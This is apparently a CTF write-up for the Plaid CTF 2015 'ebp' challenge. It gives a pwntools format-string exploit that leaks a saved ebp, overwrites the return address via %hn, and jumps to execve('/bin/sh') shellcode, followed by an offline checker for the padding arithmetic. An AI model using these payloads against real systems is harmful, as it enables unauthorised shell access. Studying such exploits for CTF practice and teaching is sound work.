cdor1's lab
Plaid CTF 2015 ebp
Afterword: fsb, die!!
from pwn import *

context.log_level = 'debug'

# 28-byte x86 execve("//bin/sh") shellcode. It contains no 0x0a and no 0x25,
# so fgets() and the format-string parser both pass it through untouched.
# Byte literals keep it intact under Python 3 (a str would be UTF-8 encoded).
sh  = b'\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89'
sh += b'\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80'

s = remote('localhost', 4000)

# Stage 0: argument 4 of the format call is a saved ebp, so %4$x leaks a stack address.
s.sendline(b'%4$x')
ebp = int(s.recvuntil(b'\n'), 16)

# Stage 1: %4$hn writes through that saved ebp. Padding to the low 16 bits of
# ebp+4 repoints it at the slot holding the return address (%hn stores 16 bits,
# hence the mask; parentheses make the precedence explicit).
target = (ebp + 4) & 0xffff
s.sendline(b'%' + str(target).encode() + b'c%4$hn')
s.recvuntil(b'\n')

# Stage 2: after the redirect, argument 12 points at the return-address slot.
# 28 shellcode bytes + 41060 padding = 41088 = 0xa080, the low half of the
# address the shellcode-bearing input lives at; the high half is kept, so the
# function returns into the shellcode at the start of this buffer.
exp = sh + b'%41060c%12$hn'
s.sendline(exp)
s.recvuntil(b'\n')
s.interactive()
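The byte accounting behind the two payloads (why the padding is 41060 rather than 0xa080, and how the 16-bit store of %hn wraps) is the part of this exploit that is easiest to get wrong, so here is an added offline checker. It is example code written for this page, not part of cdor1's script or of the challenge binary; the leaked address 0xbffff5e8 is a constructed sample and the names build_hn_payload, simulate_hn_writes and stage_payloads are mine. The model only knows the conversions these payloads use (literal bytes, %Nc, %k$hn) and rejects anything else, so a stray '%' in a shellcode cannot slip through unnoticed.

```python
import re

# 28-byte execve("//bin/sh") shellcode from the write-up above; it contains no
# '%' (0x25) and no '\n' (0x0a), so fgets() and the format parser leave it alone.
SHELLCODE = (b'\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89'
             b'\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80')

# Only the two conversions the payloads rely on: "%<width>c" and "%<k>$hn".
_CONV = re.compile(rb'%(\d*)c|%(\d+)\$hn')


def build_hn_payload(prefix: bytes, value: int, argidx: int) -> bytes:
    """Append '%<pad>c%<argidx>$hn' so that printf's running output count at the
    %hn equals value modulo 0x10000, which is exactly what %hn stores.  The prefix
    (shellcode, or nothing) is subtracted because printf counts those bytes too."""
    pad = (value - len(prefix)) & 0xffff
    if pad == 0:
        pad = 0x10000          # %c prints at least one byte, so force a full wrap
    return prefix + b'%' + str(pad).encode() + b'c%' + str(argidx).encode() + b'$hn'


def simulate_hn_writes(fmt: bytes):
    """Model printf's output counter for fmt: literal bytes count 1 each, %Nc
    counts max(N, 1), and %k$hn records (k, count & 0xffff) without printing.
    Returns (total_count, writes).  Any other conversion raises ValueError."""
    count, writes, pos = 0, [], 0
    while pos < len(fmt):
        if fmt[pos] != 0x25:            # not '%': one literal output byte
            count += 1
            pos += 1
            continue
        m = _CONV.match(fmt, pos)
        if m is None:
            raise ValueError('unsupported conversion at offset %d' % pos)
        if m.group(2) is not None:      # %k$hn: store the low 16 bits of the count
            writes.append((int(m.group(2)), count & 0xffff))
        else:                           # %Nc: width 0 or absent still prints one char
            count += max(int(m.group(1) or b'0'), 1)
        pos = m.end()
    return count, writes


def stage_payloads(leaked_ebp: int, shellcode: bytes = SHELLCODE, buf_low16: int = 0xa080):
    """Reproduce the two writes of the exploit above: stage 1 repoints the saved
    ebp reachable as argument 4 at the return-address slot (ebp + 4); stage 2
    stores the low half of the buffer address (0xa080 in the write-up) over the
    return address through argument 12."""
    stage1 = build_hn_payload(b'', (leaked_ebp + 4) & 0xffff, 4)
    stage2 = build_hn_payload(shellcode, buf_low16, 12)
    return stage1, stage2


if __name__ == '__main__':
    s1, s2 = stage_payloads(0xbffff5e8)     # constructed sample leak, not a real value
    for p in (s1, s2):
        total, writes = simulate_hn_writes(p)
        print(p[-16:], 'counts', total, 'writes', [(k, hex(v)) for k, v in writes])
```

Run it before pointing the real script at a target: if the simulated write for stage 2 is not (12, 0xa080), the padding constant is off, and if the checker raises on the shellcode, the shellcode contains a byte the format parser will interpret.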